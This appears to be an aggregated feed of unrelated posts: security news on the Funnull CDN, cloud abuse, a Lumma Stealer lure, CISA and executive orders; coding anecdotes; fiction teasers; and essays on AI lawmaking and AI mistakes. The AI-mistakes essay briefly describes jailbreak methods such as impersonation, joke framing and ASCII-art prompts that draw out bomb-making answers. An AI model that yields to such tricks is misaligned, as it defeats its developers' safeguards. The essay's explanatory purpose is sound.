In an effort to blend in and make their malicious traffic tougher to block, hosting firms catering to cybercriminals in China and Russia increasingly are funneling their operations through major U.S. cloud providers. Research published this week on one such outfit — a sprawling network tied to Chinese organized crime gangs and aptly named “Funnull” — highlights a persistent whac-a-mole problem facing cloud services.
In October 2024, the security firm Silent Push published a lengthy analysis of how Amazon AWS and Microsoft Azure were providing services to Funnull, a two-year-old Chinese content delivery network that hosts a wide variety of fake trading apps, pig butchering scams, gambling websites, and retail phishing pages.
Funnull made headlines last summer after it acquired the domain name polyfill[.]io, previously the home of a widely-used open source code library that allowed older browsers to handle advanced functions that weren’t natively supported. There were still tens of thousands of legitimate domains linking to the Polyfill domain at the time of its acquisition, and Funnull soon after conducted a supply-chain attack that redirected visitors to malicious sites.
Silent Push’s October 2024 report found a vast number of domains hosted via Funnull promoting gambling sites that bear the logo of the Suncity Group, a Chinese entity named in a 2024 UN report (PDF) for laundering millions of dollars for the North Korean Lazarus Group.
It is likely the gambling sites coming through Funnull are abusing top casino brands as part of their money laundering schemes. In reporting on Silent Push’s October report, TechCrunchobtained a comment from Bwin, one of the casinos being advertised en masse through Funnull, and Bwin said those websites did not belong to them.
Gambling is illegal in China except in Macau, a special administrative region of China. Silent Push researchers say Funnull may be helping online gamblers in China evade the Communist party’s “Great Firewall,” which blocks access to gambling destinations.
Silent Push’s Zach Edwards said that upon revisiting Funnull’s infrastructure again this month, they found dozens of the same Amazon and Microsoft cloud Internet addresses still forwarding Funnull traffic through a dizzying chain of auto-generated domain names before redirecting malicious or phishous websites.
Edwards said Funnull is a textbook example of an increasing trend Silent Push calls “infrastructure laundering,” wherein crooks selling cybercrime services will relay some or all of their malicious traffic through U.S. cloud providers.
“It’s crucial for global hosting companies based in the West to wake up to the fact that extremely low quality and suspicious web hosts based out of China are deliberately renting IP space from multiple companies and then mapping those IPs to their criminal client websites,” Edwards told KrebsOnSecurity. “We need these major hosts to create internal policies so that if they are renting IP space to one entity, who further rents it to host numerous criminal websites, all of those IPs should be reclaimed and the CDN who purchased them should be banned from future IP rentals or purchases.”
A Suncity gambling site promoted via Funnull. The sites feature a prompt for a Tether/USDT deposit program.
Reached for comment, Amazon referred this reporter to a statement Silent Push included in a report released today. Amazon said AWS was already aware of the Funnull addresses tracked by Silent Push, and that it had suspended all known accounts linked to the activity.
Amazon said that contrary to implications in the Silent Push report, it has every reason to aggressively police its network against this activity, noting the accounts tied to Funnull used “fraudulent methods to temporarily acquire infrastructure, for which it never pays. Thus, AWS incurs damages as a result of the abusive activity.”
“When AWS’s automated or manual systems detect potential abuse, or when we receive reports of potential abuse, we act quickly to investigate and take action to stop any prohibited activity,” Amazon’s statement continues. “In the event anyone suspects that AWS resources are being used for abusive activity, we encourage them to report it to AWS Trust & Safety using the report abuse form. In this case, the authors of the report never notified AWS of the findings of their research via our easy-to-find security and abuse reporting channels. Instead, AWS first learned of their research from a journalist to whom the researchers had provided a draft.”
Microsoft likewise said it takes such abuse seriously, and encouraged others to report suspicious activity found on its network.
“We are committed to protecting our customers against this kind of activity and actively enforce acceptable use policies when violations are detected,” Microsoft said in a written statement. “We encourage reporting suspicious activity to Microsoft so we can investigate and take appropriate actions.”
Richard Hummel is threat intelligence lead at NETSCOUT. Hummel said it used to be that “noisy” and frequently disruptive malicious traffic — such as automated application layer attacks, and “brute force” efforts to crack passwords or find vulnerabilities in websites — came mostly from botnets, or large collections of hacked devices.
But he said the vast majority of the infrastructure used to funnel this type of traffic is now proxied through major cloud providers, which can make it difficult for organizations to block at the network level.
“From a defenders point of view, you can’t wholesale block cloud providers, because a single IP can host thousands or tens of thousands of domains,” Hummel said.
In May 2024, KrebsOnSecurity published a deep dive on Stark Industries Solutions, an ISP that materialized at the start of Russia’s invasion of Ukraine and has been used as a global proxy network that conceals the true source of cyberattacks and disinformation campaigns against enemies of Russia. Experts said much of the malicious traffic traversing Stark’s network (e.g. vulnerability scanning and password brute force attacks) was being bounced through U.S.-based cloud providers.
Stark’s network has been a favorite of the Russian hacktivist group called NoName057(16), which frequently launches huge distributed denial-of-service (DDoS) attacks against a variety of targets seen as opposed to Moscow. Hummel said NoName’s history suggests they are adept at cycling through new cloud provider accounts, making anti-abuse efforts into a game of whac-a-mole.
“It almost doesn’t matter if the cloud provider is on point and takes it down because the bad guys will just spin up a new one,” he said. “Even if they’re only able to use it for an hour, they’ve already done their damage. It’s a really difficult problem.”
Edwards said Amazon declined to specify whether the banned Funnull users were operating using compromised accounts or stolen payment card data, or something else.
“I’m surprised they wanted to lean into ‘We’ve caught this 1,200+ times and have taken these down!’ and yet didn’t connect that each of those IPs was mapped to [the same] Chinese CDN,” he said. “We’re just thankful Amazon confirmed that account mules are being used for this and it isn’t some front-door relationship. We haven’t heard the same thing from Microsoft but it’s very likely that the same thing is happening.”
Funnull wasn’t always a bulletproof hosting network for scam sites. Prior to 2022, the network was known as Anjie CDN, based in the Philippines. One of Anjie’s properties was a website called funnull[.]app. Loading that domain reveals a pop-up message by the original Anjie CDN owner, who said their operations had been seized by an entity known as Fangneng CDN and ACB Group, the parent company of Funnull.
A machine-translated message from the former owner of Anjie CDN, a Chinese content delivery network that is now Funnull.
“After I got into trouble, the company was managed by my family,” the message explains. “Because my family was isolated and helpless, they were persuaded by villains to sell the company. Recently, many companies have contacted my family and threatened them, believing that Fangneng CDN used penetration and mirroring technology through customer domain names to steal member information and financial transactions, and stole customer programs by renting and selling servers. This matter has nothing to do with me and my family. Please contact Fangneng CDN to resolve it.”
In January 2024, the U.S. Department of Commerce issued a proposed rule that would require cloud providers to create a “Customer Identification Program” that includes procedures to collect data sufficient to determine whether each potential customer is a foreign or U.S. person.
According to the law firm Crowell & Moring LLP, the Commerce rule also would require “infrastructure as a service” (IaaS) providers to report knowledge of any transactions with foreign persons that might allow the foreign entity to train a large AI model with potential capabilities that could be used in malicious cyber-enabled activity.
“The proposed rulemaking has garnered global attention, as its cross-border data collection requirements are unprecedented in the cloud computing space,” Crowell wrote. “To the extent the U.S. alone imposes these requirements, there is concern that U.S. IaaS providers could face a competitive disadvantage, as U.S. allies have not yet announced similar foreign customer identification requirements.”
It remains unclear if the new White House administration will push forward with the requirements. The Commerce action was mandated as part of an executive order President Trump issued a day before leaving office in January 2021.
There are thousands of fake Reddit and WeTransfer webpages that are pushing malware. They exploit people who are using search engines to search sites like Reddit.
Unsuspecting victims clicking on the link are taken to a fake WeTransfer site that mimicks the interface of the popular file-sharing service. The ‘Download’ button leads to the Lumma Stealer payload hosted on “weighcobbweo[.]top.”
I'm a JSON curmudgeon, in that I think that its type-system, inherited from JavaScript, is bad. It's a limited vocabulary of types, and it forces developers to play odd games of convention. For example, because it lacks any sort of date type, you either have to explode your date out as a sub-dictionary (arguably, the "right" approach) or do what most people do- use an ISO formatted string as your date. The latter version requires you to attempt to parse the sting to validate the data, but validating JSON is a whole thing anyway.
But, enough about me being old and cranky. Do you know one type JSON supports? Boolean values.
Which is why this specification from today's anonymous submitter annoys me so much:
Their custom validator absolutely requires the use of strings, and absolutely requires that they have these values. Sending a boolean, or worse, the string "true" causes the request to get rejected.
Our submitter doesn't explain why it's this way, but I have a strong suspicion that it's because it was originally designed to support a form submission with radio buttons. The form is long gone, but the API contract remains.
[Advertisement]
Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.
Author: Tamiko Bronson “How will they find us, Grandma?” She smiled, pulling her paintbrush across each rice paper lantern. Velvet black ink seeped into the fibers, revealing names: Tsuneo. Kazuko. Satoshi. Our ancestors. “Come, Kana-chan.” We carried the lanterns to the garden. One by one, we lined the path. “The lights will guide them.” I […]
Author: Alastair Millar “It’s quite impressive, really,” said Annika, leaning back in her chair. As General Overseer at Europe’s busiest spaceport, she’d worked hard to get where she was, and could afford to be relaxed. “It’s bloody annoying, is what it is,” retorted Hans. As a Senior Processing Officer, he tended to find himself at […]
Today's anonymous submitter spent a few weeks feeling pretty good about themselves. You see, they'd inherited a gigantic and complex pile of code, an application spread out across 15 backend servers, theoretically organized into "modules" and "microservices" but in reality was a big ball of mud. And after a long and arduous process, they'd dug through that ball of mud and managed to delete 190 files, totaling 30,000 lines of code. That was fully 2/3rds of the total codebase, gone- and yet the tests continued to pass, the application continued to run, and everyone was just much happier with it.
Two weeks later, a new ticket comes in: users are getting a 403 error when trying to access the "User Update" screen. Our submitter has seen a lot of these tickets, and it almost always means that the user's permissions are misconfigured. It's an easy fix, and not a code problem.
Just to be on the safe side, though, they pull up the screen with their account- guaranteed to have the right permissions- and get a 403.
As you can imagine, the temptation to sneak a few fixes in alongside this massive refactoring was impossible to resist. One of the problems was that most of their routes were camelCase URLs, but userupdate was not. So they'd fixed it. It was a minor change, and it worked in testing. So what was happening?
Well, there was a legacy authorization database. It was one of those 15 backend servers, and it ran no web code, and thus wasn't touched by our submitter's refactoring. Despite their web layer having copious authorization and authentication code, someone had decided back in the olden days, to implement that authorization and authentication in its own database.
Not every request went through this database. It impacted new sessions, but only under specific conditions. But this database had a table in it, which listed off all the routes. And unlike the web code, which used regular expressions for checking routes, and were case insensitive, this database did a strict equality comparison.
The fix was simple: update the table to allow userUpdate. But it also pointed towards a deeper, meaner target for future refactoring: dealing with this sometimes required (but often not!) authentication step lurking in a database that no one had thought about until our submitter's refactoring broke something.
[Advertisement]
ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.
Artificial intelligence (AI) is writing law today. This has required no changes in legislative procedure or the rules of legislative bodies—all it takes is one legislator, or legislative assistant, to use generative AI in the process of drafting a bill.
In fact, the use of AI by legislators is only likely to become more prevalent. There are currently projects in the US House, US Senate, and legislatures around the world to trial the use of AI in various ways: searching databases, drafting text, summarizing meetings, performing policy research and analysis, and more. A Brazilian municipality passed the first known AI-written law in 2023.
That’s not surprising; AI is being used more everywhere. What is coming into focus is how policymakers will use AI and, critically, how this use will change the balance of power between the legislative and executive branches of government. Soon, US legislators may turn to AI to help them keep pace with the increasing complexity of their lawmaking—and this will suppress the power and discretion of the executive branch to make policy.
Demand for Increasingly Complex Legislation
Legislators are writing increasingly long, intricate, and complicated laws that human legislative drafters have trouble producing. Already in the US, the multibillion-dollar lobbying industry is subsidizing lawmakers in writing baroque laws: suggesting paragraphs to add to bills, specifying benefits for some, carving out exceptions for others. Indeed, the lobbying industry is growing in complexity and influence worldwide.
Several years ago, researchers studied bills introduced into state legislatures throughout the US, looking at which bills were wholly original texts and which borrowed text from other states or from lobbyist-written model legislation. Their conclusion was not very surprising. Those who borrowed the most text were in legislatures that were less resourced. This makes sense: If you’re a part-time legislator, perhaps unpaid and without a lot of staff, you need to rely on more external support to draft legislation. When the scope of policymaking outstrips the resources of legislators, they look for help. Today, that often means lobbyists, who provide expertise, research services, and drafting labor to legislators at the local, state, and federal levels at no charge. Of course, they are not unbiased: They seek to exert influence on behalf of their clients.
Another study, at the US federal level, measured the complexity of policies proposed in legislation and tried to determine the factors that led to such growing complexity. While there are numerous ways to measure legal complexity, these authors focused on the specificity of institutional design: How exacting is Congress in laying out the relational network of branches, agencies, and officials that will share power to implement the policy?
In looking at bills enacted between 1993 and 2014, the researchers found two things. First, they concluded that ideological polarization drives complexity. The suggestion is that if a legislator is on the extreme end of the ideological spectrum, they’re more likely to introduce a complex law that constrains the discretion of, as the authors put it, “entrenched bureaucratic interests.” And second, they found that divided government drives complexity to a large degree: Significant legislation passed under divided government was found to be 65 percent more complex than similar legislation passed under unified government. Their conclusion is that, if a legislator’s party controls Congress, and the opposing party controls the White House, the legislator will want to give the executive as little wiggle room as possible. When legislators’ preferences disagree with the executive’s, the legislature is incentivized to write laws that specify all the details. This gives the agency designated to implement the law as little discretion as possible.
Because polarization and divided government are increasingly entrenched in the US, the demand for complex legislation at the federal level is likely to grow. Today, we have both the greatest ideological polarization in Congress in living memory and an increasingly divided government at the federal level. Between 1900 and 1970 (57th through 90th Congresses), we had 27 instances of unified government and only seven divided; nearly a four-to-one ratio. Since then, the trend is roughly the opposite. As of the start of the next Congress, we will have had 20 divided governments and only eight unified (nearly a three-to-one ratio). And while the incoming Trump administration will see a unified government, the extremely closely divided House may often make this Congress look and feel like a divided one (see the recent government shutdown crisis as an exemplar) and makes truly divided government a strong possibility in 2027.
Another related factor driving the complexity of legislation is the need to do it all at once. The lobbyist feeding frenzy—spurring major bills like the Affordable Care Act to be thousands of pages in length—is driven in part by gridlock in Congress. Congressional productivity has dropped so low that bills on any given policy issue seem like a once-in-a-generation opportunity for legislators—and lobbyists—to set policy.
These dynamics also impact the states. States often have divided governments, albeit less often than they used to, and their demand for drafting assistance is arguably higher due to their significantly smaller staffs. And since the productivity of Congress has cratered in recent years, significantly more policymaking is happening at the state level.
But there’s another reason, particular to the US federal government, that will likely force congressional legislation to be more complex even during unified government. In June 2024, the US Supreme Court overturned the Chevron doctrine, which gave executive agencies broad power to specify and implement legislation. Suddenly, there is a mandate from the Supreme Court for more specific legislation. Issues that have historically been left implicitly to the executive branch are now required to be either explicitly delegated to agencies or specified directly in statute. Either way, the Court’s ruling implied that law should become more complex and that Congress should increase its policymaking capacity.
This affects the balance of power between the executive and legislative branches of government. When the legislature delegates less to the executive branch, it increases its own power. Every decision made explicitly in statute is a decision the executive makes not on its own but, rather, according to the directive of the legislature. In the US system of separation of powers, administrative law is a tool for balancing power among the legislative, executive, and judicial branches. The legislature gets to decide when to delegate and when not to, and it can respond to judicial review to adjust its delegation of control as needed. The elimination of Chevron will induce the legislature to exert its control over delegation more robustly.
At the same time, there are powerful political incentives for Congress to be vague and to rely on someone else, like agency bureaucrats, to make hard decisions. That empowers third parties—the corporations, or lobbyists—that have been gifted by the overturning of Chevron a new tool in arguing against administrative regulations not specifically backed up by law. A continuing stream of Supreme Court decisions handing victories to unpopular industries could be another driver of complex law, adding political pressure to pass legislative fixes.
AI Can Supply Complex Legislation
Congress may or may not be up to the challenge of putting more policy details into law, but the external forces outlined above—lobbyists, the judiciary, and an increasingly divided and polarized government—are pushing them to do so. When Congress does take on the task of writing complex legislation, it’s quite likely it will turn to AI for help.
Two particular AI capabilities enable Congress to write laws different from laws humans tend to write. One, AI models have an enormous scope of expertise, whereas people have only a handful of specializations. Large language models (LLMs) like the one powering ChatGPT can generate legislative text on funding specialty crop harvesting mechanization equally as well as material on energy efficiency standards for street lighting. This enables a legislator to address more topics simultaneously. Two, AI models have the sophistication to work with a higher degree of complexity than people can. Modern LLM systems can instantaneously perform several simultaneous multistep reasoning tasks using information from thousands of pages of documents. This enables a legislator to fill in more baroque detail on any given topic.
That’s not to say that handing over legislative drafting to machines is easily done. Modernizing any institutional process is extremely hard, even when the technology is readily available and performant. And modern AI still has a ways to go to achieve mastery of complex legal and policy issues. But the basic tools are there.
AI can be used in each step of lawmaking, and this will bring various benefits to policymakers. It could let them work on more policies—more bills—at the same time, add more detail and specificity to each bill, or interpret and incorporate more feedback from constituents and outside groups. The addition of a single AI tool to a legislative office may have an impact similar to adding several people to their staff, but with far lower cost.
Speed sometimes matters when writing law. When there is a change of governing party, there is often a rush to change as much policy as possible to match the platform of the new regime. AI could help legislators do that kind of wholesale revision. The result could be policy that is more responsive to voters—or more political instability. Already in 2024, the US House’s Office of the Clerk has begun using AI to speed up the process of producing cost estimates for bills and understanding how new legislation relates to existing code. Ohio has used an AI tool to do wholesale revision of state administrative law since 2020.
AI can also make laws clearer and more consistent. With their superhuman attention spans, AI tools are good at enforcing syntactic and grammatical rules. They will be effective at drafting text in precise and proper legislative language, or offering detailed feedback to human drafters. Borrowing ideas from software development, where coders use tools to identify common instances of bad programming practices, an AI reviewer can highlight bad law-writing practices. For example, it can detect when significant phrasing is inconsistent across a long bill. If a bill about insurance repeatedly lists a variety of disaster categories, but leaves one out one time, AI can catch that.
Perhaps this seems like minutiae, but a small ambiguity or mistake in law can have massive consequences. In 2015, the Affordable Care Act came close to being struck down because of a typo in four words, imperiling health care services extended to more than 7 million Americans.
There’s more that AI can do in the legislative process. AI can summarize bills and answer questions about their provisions. It can highlight aspects of a bill that align with, or are contrary to, different political points of view. We can even imagine a future in which AI can be used to simulate a new law and determine whether or not it would be effective, or what the side effects would be. This means that beyond writing them, AI could help lawmakers understand laws. Congress is notorious for producing bills hundreds of pages long, and many other countries sometimes have similarly massive omnibus bills that address many issues at once. It’s impossible for any one person to understand how each of these bills’ provisions would work. Many legislatures employ human analysis in budget or fiscal offices that analyze these bills and offer reports. AI could do this kind of work at greater speed and scale, so legislators could easily query an AI tool about how a particular bill would affect their district or areas of concern.
These capabilities will be attractive to legislators who are looking to expand their power and capabilities but don’t necessarily have more funding to hire human staff. We should understand the idea of AI-augmented lawmaking contextualized within the longer history of legislative technologies. To serve society at modern scales, we’ve had to come a long way from the Athenian ideals of direct democracy and sortition. Democracy no longer involves just one person and one vote to decide a policy. It involves hundreds of thousands of constituents electing one representative, who is augmented by a staff as well as subsidized by lobbyists, and who implements policy through a vast administrative state coordinated by digital technologies. Using AI to help those representatives specify and refine their policy ideas is part of a long history of transformation.
Whether all this AI augmentation is good for all of us subject to the laws they make is less clear. There are real risks to AI-written law, but those risks are not dramatically different from what we endure today. AI-written law trying to optimize for certain policy outcomes may get it wrong (just as many human-written laws are misguided). AI-written law may be manipulated to benefit one constituency over others, by the tech companies that develop the AI, or by the legislators who apply it, just as human lobbyists steer policy to benefit their clients.
Regardless of what anyone thinks of any of this, regardless of whether it will be a net positive or a net negative, AI-made legislation is coming—the growing complexity of policy demands it. It doesn’t require any changes in legislative procedures or agreement from any rules committee. All it takes is for one legislative assistant, or lobbyist, to fire up a chatbot and ask it to create a draft. When legislators voted on that Brazilian bill in 2023, they didn’t know it was AI-written; the use of ChatGPT was undisclosed. And even if they had known, it’s not clear it would have made a difference. In the future, as in the past, we won’t always know which laws will have good impacts and which will have bad effects, regardless of the words on the page, or who (or what) wrote them.
This essay was written with Nathan E. Sanders, and originally appeared in Lawfare.
Humans make mistakes all the time. All of us do, every day, in tasks both new and routine. Some of our mistakes are minor and some are catastrophic. Mistakes can break trust with our friends, lose the confidence of our bosses, and sometimes be the difference between life and death.
Over the millennia, we have created security systems to deal with the sorts of mistakes humans commonly make. These days, casinos rotate their dealers regularly, because they make mistakes if they do the same task for too long. Hospital personnel write on limbs before surgery so that doctors operate on the correct body part, and they count surgical instruments to make sure none were left inside the body. From copyediting to double-entry bookkeeping to appellate courts, we humans have gotten really good at correcting human mistakes.
Humanity is now rapidly integrating a wholly different kind of mistake-maker into society: AI. Technologies like large language models (LLMs) can perform many cognitive tasks traditionally fulfilled by humans, but they make plenty of mistakes. It seems ridiculous when chatbots tell you to eat rocks or add glue to pizza. But it’s not the frequency or severity of AI systems’ mistakes that differentiates them from human mistakes. It’s their weirdness. AI systems do not make mistakes in the same ways that humans do.
Much of the friction—and risk—associated with our use of AI arise from that difference. We need to invent new security systems that adapt to these differences and prevent harm from AI mistakes.
Human Mistakes vs AI Mistakes
Life experience makes it fairly easy for each of us to guess when and where humans will make mistakes. Human errors tend to come at the edges of someone’s knowledge: Most of us would make mistakes solving calculus problems. We expect human mistakes to be clustered: A single calculus mistake is likely to be accompanied by others. We expect mistakes to wax and wane, predictably depending on factors such as fatigue and distraction. And mistakes are often accompanied by ignorance: Someone who makes calculus mistakes is also likely to respond “I don’t know” to calculus-related questions.
To the extent that AI systems make these human-like mistakes, we can bring all of our mistake-correcting systems to bear on their output. But the current crop of AI models—particularly LLMs—make mistakes differently.
AI errors come at seemingly random times, without any clustering around particular topics. LLM mistakes tend to be more evenly distributed through the knowledge space. A model might be equally likely to make a mistake on a calculus question as it is to propose that cabbages eat goats.
And AI mistakes aren’t accompanied by ignorance. A LLM will be just as confident when saying something completely wrong—and obviously so, to a human—as it will be when saying something true. The seemingly random inconsistency of LLMs makes it hard to trust their reasoning in complex, multi-step problems. If you want to use an AI model to help with a business problem, it’s not enough to see that it understands what factors make a product profitable; you need to be sure it won’t forget what money is.
How to Deal with AI Mistakes
This situation indicates two possible areas of research. The first is to engineer LLMs that make more human-like mistakes. The second is to build new mistake-correcting systems that deal with the specific sorts of mistakes that LLMs tend to make.
We already have some tools to lead LLMs to act in more human-like ways. Many of these arise from the field of “alignment” research, which aims to make models act in accordance with the goals and motivations of their human developers. One example is the technique that was arguably responsible for the breakthrough success of ChatGPT: reinforcement learning with human feedback. In this method, an AI model is (figuratively) rewarded for producing responses that get a thumbs-up from human evaluators. Similar approaches could be used to induce AI systems to make more human-like mistakes, particularly by penalizing them more for mistakes that are less intelligible.
When it comes to catching AI mistakes, some of the systems that we use to prevent human mistakes will help. To an extent, forcing LLMs to double-check their own work can help prevent errors. But LLMs can also confabulate seemingly plausible, but truly ridiculous, explanations for their flights from reason.
Other mistake mitigation systems for AI are unlike anything we use for humans. Because machines can’t get fatigued or frustrated in the way that humans do, it can help to ask an LLM the same question repeatedly in slightly different ways and then synthesize its multiple responses. Humans won’t put up with that kind of annoying repetition, but machines will.
Understanding Similarities and Differences
Researchers are still struggling to understand where LLM mistakes diverge from human ones. Some of the weirdness of AI is actually more human-like than it first appears. Small changes to a query to an LLM can result in wildly different responses, a problem known as prompt sensitivity. But, as any survey researcher can tell you, humans behave this way, too. The phrasing of a question in an opinion poll can have drastic impacts on the answers.
LLMs also seem to have a bias towards repeating the words that were most common in their training data; for example, guessing familiar place names like “America” even when asked about more exotic locations. Perhaps this is an example of the human “availability heuristic” manifesting in LLMs, with machines spitting out the first thing that comes to mind rather than reasoning through the question. And like humans, perhaps, some LLMs seem to get distracted in the middle of long documents; they’re better able to remember facts from the beginning and end. There is already progress on improving this error mode, as researchers have found that LLMs trained on more examples of retrieving information from long texts seem to do better at retrieving information uniformly.
In some cases, what’s bizarre about LLMs is that they act more like humans than we think they should. For example, some researchers have tested the hypothesis that LLMs perform better when offered a cash reward or threatened with death. It also turns out that some of the best ways to “jailbreak” LLMs (getting them to disobey their creators’ explicit instructions) look a lot like the kinds of social engineering tricks that humans use on each other: for example, pretending to be someone else or saying that the request is just a joke. But other effective jailbreaking techniques are things no human would ever fall for. One group found that if they used ASCII art (constructions of symbols that look like words or pictures) to pose dangerous questions, like how to build a bomb, the LLM would answer them willingly.
Humans may occasionally make seemingly random, incomprehensible, and inconsistent mistakes, but such occurrences are rare and often indicative of more serious problems. We also tend not to put people exhibiting these behaviors in decision-making positions. Likewise, we should confine AI decision-making systems to applications that suit their actual abilities—while keeping the potential ramifications of their mistakes firmly in mind.
This essay was written with Nathan E. Sanders, and originally appeared in IEEE Spectrum.
The Department of Justice is investigating a lobbying firm representing ExxonMobil for hacking the phones of climate activists:
The hacking was allegedly commissioned by a Washington, D.C., lobbying firm, according to a lawyer representing the U.S. government. The firm, in turn, was allegedly working on behalf of one of the world’s largest oil and gas companies, based in Texas, that wanted to discredit groups and individuals involved in climate litigation, according to the lawyer for the U.S. government. In court documents, the Justice Department does not name either company.
As part of its probe, the U.S. is trying to extradite an Israeli private investigator named Amit Forlit from the United Kingdom for allegedly orchestrating the hacking campaign. A lawyer for Forlit claimed in a court filing that the hacking operation her client is accused of leading “is alleged to have been commissioned by DCI Group, a lobbying firm representing ExxonMobil, one of the world’s largest fossil fuel companies.”
Jen Easterly is out as the Director of CISA. Read her final interview:
There’s a lot of unfinished business. We have made an impact through our ransomware vulnerability warning pilot and our pre-ransomware notification initiative, and I’m really proud of that, because we work on preventing somebody from having their worst day. But ransomware is still a problem. We have been laser-focused on PRC cyber actors. That will continue to be a huge problem. I’m really proud of where we are, but there’s much, much more work to be done. There are things that I think we can continue driving, that the next administration, I hope, will look at, because, frankly, cybersecurity is a national security issue.
If Project 2025 is a guide, the agency will be gutted under Trump:
“Project 2025’s recommendations—essentially because this one thing caused anger—is to just strip the agency of all of its support altogether,” he said. “And CISA’s functions go so far beyond its role in the information space in a way that would do real harm to election officials and leave them less prepared to tackle future challenges.”
In the DHS chapter of Project 2025, Cucinelli suggests gutting CISA almost entirely, moving its core responsibilities on critical infrastructure to the Department of Transportation. It’s a suggestion that Adav Noti, the executive director of the nonpartisan voting rights advocacy organization Campaign Legal Center, previously described to Democracy Docket as “absolutely bonkers.”
“It’s located at Homeland Security because the whole premise of the Department of Homeland Security is that it’s supposed to be the central resource for the protection of the nation,” Noti said. “And that the important functions shouldn’t be living out in siloed agencies.”
Paul's co-worker needed to manage some data in a tree. To do that, they wrote this Java function:
privatestaticbooleanexistsFather(ArrayList<Integer> fatherFolder, Integer fatherId) {
for (Integer father : fatherFolder) {
if (father.equals(fatherId))
returntrue;
}
returnfalse;
}
I do not know what the integers in use represent here. I don't think they're actually representing "folders", despite the variable names in the code. I certainly hope it's not representing files and folders, because that implies they're tossing around file handles in some C-brained approach (but badly, since it implies they've got an open handle for every object).
The core WTF, in my opinion, is this- the code clearly implies some sort of tree structure, the tree contains integers, but they're not using any of the Java structures for handling trees, and implementing this slipshod approach. And even then, this code could be made more generic, as the general process works with any sane Java type.
But there's also the obvious WTF: the java.util.Collection interface, which an ArrayList implements, already handles all of this in its contains method. This entire function could be replaced with fatherFolder.contains(fatherId).
Paul writes: "I guess the last developer didn't know that every implementation of a java.util.Collection has a method called contains. At least they knew how to do a for-each.".
[Advertisement]
Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.
Author: Majoki Cantor waited until Hazzez finished checking the airlock before asking about the Frumies. Hazzez flashed a crooked grin revealing the eclectic range of micro-implants in his teeth. “Why do you want to know about the Frumies?” Cantor shrugged. “Sarge said not to give them anything under any circumstances. Zilch. Nada. Why? Seems kind […]
President Trump last week issued a flurry of executive orders that upended a number of government initiatives focused on improving the nation’s cybersecurity posture. The president fired all advisors from the Department of Homeland Security’s Cyber Safety Review Board, called for the creation of a strategic cryptocurrency reserve, and voided a Biden administration action that sought to reduce the risks that artificial intelligence poses to consumers, workers and national security.
On his first full day back in the White House, Trump dismissed all 15 advisory committee members of the Cyber Safety Review Board (CSRB), a nonpartisan government entity established in February 2022 with a mandate to investigate the causes of major cybersecurity events. The CSRB has so far produced three detailed reports, including an analysis of the Log4Shell vulnerability crisis, attacks from the cybercrime group LAPSUS$, and the 2023 Microsoft Exchange Online breach.
The CSRB was in the midst of an inquiry into cyber intrusions uncovered recently across a broad spectrum of U.S. telecommunications providers at the hands of Chinese state-sponsored hackers. One of the CSRB’s most recognizable names is Chris Krebs (no relation), the former director of the Cybersecurity and Infrastructure Security Agency (CISA). Krebs was fired by President Trump in November 2020 for declaring the presidential contest was the most secure in American history, and for refuting Trump’s false claims of election fraud.
South Dakota Governor Kristi Noem, confirmed by the U.S. Senate last week as the new director of the DHS, criticized CISA at her confirmation hearing, TheRecordreports.
Noem told lawmakers CISA needs to be “much more effective, smaller, more nimble, to really fulfill their mission,” which she said should be focused on hardening federal IT systems and hunting for digital intruders. Noem said the agency’s work on fighting misinformation shows it has “gotten far off mission” and involved “using their resources in ways that was never intended.”
“The misinformation and disinformation that they have stuck their toe into and meddled with, should be refocused back onto what their job is,” she said.
Moses Frost, a cybersecurity instructor with the SANS Institute, compared the sacking of the CSRB members to firing all of the experts at the National Transportation Safety Board (NTSB) while they’re in the middle of an investigation into a string of airline disasters.
“I don’t recall seeing an ‘NTSB Board’ being fired during the middle of a plane crash investigation,” Frost said in a recent SANS newsletter. “I can say that the attackers in the phone companies will not stop because the review board has gone away. We do need to figure out how these attacks occurred, and CISA did appear to be doing some good for the vast majority of the federal systems.”
Speaking of transportation, The Record notes that Transportation Security Administration chief David Pekoskewas fired despite overseeing critical cybersecurity improvements across pipeline, rail and aviation sectors. Pekoske was appointed by Trump in 2017 and had his 5-year tenure renewed in 2022 by former President Joe Biden.
AI & CRYPTOCURRENCY
Shortly after being sworn in for a second time, Trump voided a Biden executive order that focused on supporting research and development in artificial intelligence. The previous administration’s order on AI was crafted with an eye toward managing the safety and security risks introduced by the technology. But a statement released by the White House said Biden’s approach to AI had hindered development, and that the United States would support AI systems that are “free from ideological bias or engineered social agendas,” to maintain leadership.
The Trump administration issued its own executive order on AI, which calls for an “AI Action Plan” to be led by the assistant to the president for science and technology, the White House “AI & crypto czar,” and the national security advisor. It also directs the White House to revise and reissue policies to federal agencies on the government’s acquisition and governance of AI “to ensure that harmful barriers to America’s AI leadership are eliminated.”
Trump’s AI & crypto czar is David Sacks, an entrepreneur and Silicon Valley venture capitalist who argues that the Biden administration’s approach to AI and cryptocurrency has driven innovation overseas. Sacks recently asserted that non-fungible cryptocurrency tokens and memecoins are neither securities nor commodities, but rather should be treated as “collectibles” like baseball cards and stamps.
There is already a legal definition of collectibles under the U.S. tax code that applies to things like art or antiques, which can be subject to high capital gains taxes. But Joe Hall, a capital markets attorney and partner at Davis Polk, told Fortune there are no market regulations that apply to collectibles under U.S. securities law. Hall said Sacks’ comments “suggest a viewpoint that it would not be appropriate to regulate these things the way we regulate securities.”
The new administration’s position makes sense considering that the Trump family is deeply and personally invested in a number of recent memecoin ventures that have attracted billions from investors. President Trump and First Lady Melania Trump each launched their own vanity memecoins this month, dubbed $TRUMP and $MELANIA.
The Wall Street Journalreported Thursday the market capitalization of $TRUMP stood at about $7 billion, down from a peak of near $15 billion, while $MELANIA is hovering somewhere in the $460 million mark. Just two months before the 2024 election, Trump’s three sons debuted a cryptocurrency token called World Liberty Financial.
Despite maintaining a considerable personal stake in how cryptocurrency is regulated, Trump issued an executive order on January 23 calling for a working group to be chaired by Sacks that would develop “a federal regulatory framework governing digital assets, including stablecoins,” and evaluate the creation of a “strategic national digital assets stockpile.”
Translation: Using taxpayer dollars to prop up the speculative, volatile, and highly risky cryptocurrency industry, which has been marked by endless scams, rug-pulls, 8-figure cyber heists, rampant fraud, and unrestrained innovations in money laundering.
WEAPONIZATION & DISINFORMATION
